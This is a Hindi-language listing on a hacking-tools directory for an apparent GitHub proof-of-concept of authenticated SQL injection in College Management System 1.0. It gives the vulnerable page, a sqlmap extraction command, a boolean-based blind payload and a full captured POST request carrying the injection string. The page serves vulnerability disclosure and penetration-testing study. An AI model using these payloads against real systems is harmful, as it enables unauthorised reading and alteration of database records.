Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
College-Management-System-course_code-SQL-Injection-Authenticated — कॉलेज प्रबंधन प्रणाली 1.0 में 'course_code' पैरामीटर के माध्यम से प्रमाणित SQL इंजेक्शन प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, बूलियन-आधारित ब्लाइंड पेलोड और डेटाबेस निष्कर्षण के लिए SQLmap एकीकरण के साथ। | Kitploit
उपकरण/GitHubGitHub/erengozaydin/college-management-system-course_code-sql-injection-authenticated
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHuberengozaydin/college-management-system-course_code-sql-injection-authenticated

College-Management-System-course_code-SQL-Injection-Authenticated

कॉलेज प्रबंधन प्रणाली 1.0 में 'course_code' पैरामीटर के माध्यम से प्रमाणित SQL इंजेक्शन प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट, बूलियन-आधारित ब्लाइंड पेलोड और डेटाबेस निष्कर्षण के लिए SQLmap एकीकरण के साथ।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कॉलेज प्रबंधन प्रणाली - 'course_code' SQL इंजेक्शन (प्रमाणित)

  1. विवरण:

कॉलेज प्रबंधन प्रणाली 1.0 /College-Management-System/admin/asign-single-student-subjects.php में पैरामीटर 'course_code' के माध्यम से SQL इंजेक्शन की अनुमति देती है। इस समस्या का शोषण करने से हमलावर एप्लिकेशन से समझौता कर सकता है, डेटा तक पहुँच या संशोधित कर सकता है, या अंतर्निहित डेटाबेस में अव्यक्त कमजोरियों का शोषण कर सकता है।

  1. प्रूफ ऑफ कॉन्सेप्ट:

Burpsuite में प्रभावित पेज से 'course_code' पैरामीटर के साथ अनुरोध को इंटरसेप्ट करें और इसे poc.req के रूप में सहेजें। फिर डेटाबेस से डेटा निकालने के लिए SQLmap चलाएँ:

sqlmap -r poc.req --dbms=mysql

  1. उदाहरण पेलोड:

boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ

  1. Burpsuite अनुरोध:

POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns

टूल डाउनलोड करें